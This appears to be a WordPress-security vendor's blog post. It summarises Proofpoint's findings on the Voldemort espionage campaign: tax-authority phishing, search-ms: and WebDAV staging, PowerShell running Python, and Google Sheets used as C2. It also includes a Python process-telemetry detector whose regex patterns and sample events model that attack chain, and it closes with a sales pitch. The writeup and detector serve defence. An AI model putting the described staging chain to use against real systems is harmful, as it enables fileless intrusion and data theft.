Guarding Your WordPress Site: The Evolution of Modern Malware and the Emergence of Cyber Espionage

Proofpoint researchers have uncovered an unusual malware campaign that uses Google Sheets as its command-and-control (C2) channel. The threat actors behind it impersonate tax authorities in Europe, Asia and the U.S. and have targeted more than 70 organizations worldwide. The operation delivers a custom tool, named Voldemort, that gathers information from infected systems and can load further payloads.

The targeted sectors vary widely: insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom and social benefit organizations. In short, no industry is immune to this kind of threat, and every organization needs a plan for malware removal to keep its digital presence secure.

No named threat actor has yet been attributed to this suspected cyber espionage campaign. An estimated 20,000 email messages are part of the operation. The emails, which impersonate tax authorities from around the world, warn the recipient about changes to their tax filing. The lure entices the recipient to click a Google AMP Cache URL, which redirects them to an intermediary landing page.

The landing page checks the visitor’s User-Agent string and, if the visitor is on Windows, abuses the search-ms: URI protocol handler to open a Windows Explorer window that displays a shortcut (LNK) file hosted on a remote WebDAV share, which the victim is tricked into launching. “Once the LNK file is launched, it invokes PowerShell to run Python.exe, subsequently initiating a Python script as an argument.” Because python.exe, the script and its dependencies are all loaded directly from the WebDAV share, the malware runs without any files being written to the user’s disk.

The Python script’s main job is to collect system information. It sends the collected data to an actor-controlled domain as a Base64-encoded string and then displays a decoy PDF to the user. After that, the script downloads a password-protected ZIP file from OpenDrive.
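For defenders, the most reliable place to catch this chain is process-creation telemetry: explorer.exe receiving a search-ms: URI, PowerShell spawning python.exe, and an interpreter or its script argument living on a WebDAV path. The following detector is an added example written for this article; it is not code from Proofpoint or from the campaign itself. The event field names, the interpreter list, the WebDAV path pattern, and the sample records (hostname files.example.invalid, script name stage.py) are all assumptions made for illustration.

```python
import re
from dataclasses import dataclass

# WebDAV paths as Windows renders them: \\host@SSL\..., \\host@443\... or
# \\host\DavWWWRoot\...  The pattern is an assumption of the usual syntax; a
# plain SMB path such as \\fileserver\share is deliberately NOT matched.
WEBDAV_PATH = re.compile(r"\\\\[\w.\-]+(?:(?:@SSL|@\d+)+\\|\\DavWWWRoot\\)", re.IGNORECASE)
SEARCH_MS_URI = re.compile(r"\bsearch-ms:", re.IGNORECASE)
# Script hosts that should not normally be loaded from a remote share (assumed list).
INTERPRETERS = ("python.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe")


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record; field names are assumed."""
    parent_image: str
    image: str
    command_line: str


def detect(event: ProcEvent) -> list[str]:
    """Return the campaign-specific behaviours this event exhibits (empty if benign)."""
    hits: list[str] = []
    image = event.image.lower()
    parent = event.parent_image.lower()

    # Stage 1: the landing page hands a search-ms: URI to explorer.exe, which
    # opens a remote WebDAV folder dressed up as a local search result.
    if SEARCH_MS_URI.search(event.command_line):
        hits.append("search-ms URI handler invoked")

    # Stage 2: the LNK runs PowerShell, which in turn launches python.exe.
    if parent.endswith("\\powershell.exe") and image.endswith("\\python.exe"):
        hits.append("powershell spawned python.exe")

    # Stage 3: the interpreter binary or its script argument lives on a WebDAV
    # share, so nothing has to be written to disk.
    if image.endswith(INTERPRETERS) and (
        WEBDAV_PATH.search(event.image) or WEBDAV_PATH.search(event.command_line)
    ):
        hits.append("interpreter or script sourced from WebDAV share")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Pair each flagged event's index with its findings; unflagged events are dropped."""
    return [(i, detect(e)) for i, e in enumerate(events) if detect(e)]


# Constructed sample telemetry (not real campaign data): the two malicious
# stages followed by a benign local Python run that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\explorer.exe",
        r'"C:\Windows\explorer.exe" "search-ms:query=tax&crumb=location:\\files.example.invalid@SSL\DavWWWRoot\share"',
    ),
    ProcEvent(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"\\files.example.invalid@SSL\DavWWWRoot\python\python.exe",
        r"\\files.example.invalid@SSL\DavWWWRoot\python\python.exe \\files.example.invalid@SSL\DavWWWRoot\stage.py",
    ),
    ProcEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Program Files\Python312\python.exe",
        r'"C:\Program Files\Python312\python.exe" C:\Users\alice\dev\build.py',
    ),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(findings)}")
```

The three checks are deliberately independent so that a single one (for example PowerShell launching python.exe, which some developer workstations do legitimately) is a weak signal on its own, while two or more on the same host within a short window are worth an immediate look. In a real deployment the sample list would be replaced by a feed of Sysmon or EDR process-creation events.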

The final stage is a custom backdoor called Voldemort. Written in C, it includes functions for data collection and for loading next-stage payloads, and it uses Google Sheets for C2, data exfiltration and receiving commands from the operators.

Proofpoint assesses that this activity is consistent with advanced persistent threats (APTs). At the same time, the tradecraft borrows from the e-crime landscape, where many threat actors abuse file schema URIs to reach external file-sharing resources for malware staging.

The Emerging Landscape of Cyber Espionage

After decoding the contents of the Google Sheet, Proofpoint identified a total of six victims, one of which was a sandbox or a “known researcher”. Set against roughly 20,000 messages, that small number shows the threat actors cast a wide net before zeroing in on a small pool of targets, and that organizations with widely varying levels of technical maturity were in scope.

Proofpoint writes: “While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives. The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign.”

Such developments underline the damage malware can do to an online business and the importance of services like restore hacked wordpress site, which focus on recovering a site from the aftermath of a cyber-attack.

The threat landscape continues to evolve rapidly. In a separate finding, Netskope Threat Labs discovered a new version of the Latrodectus loader, version 1.4, which adds a new C2 endpoint and two new backdoor commands: one to download shellcode from a specified server and one to retrieve arbitrary files from a remote location.

To keep up with this pace of change, there is a growing need for services dedicated to wordpress malware removal and to restoring hacked wordpress sites.

Need security services for your WordPress site? Contact DrGlenn for protection and recovery. Order Services Today!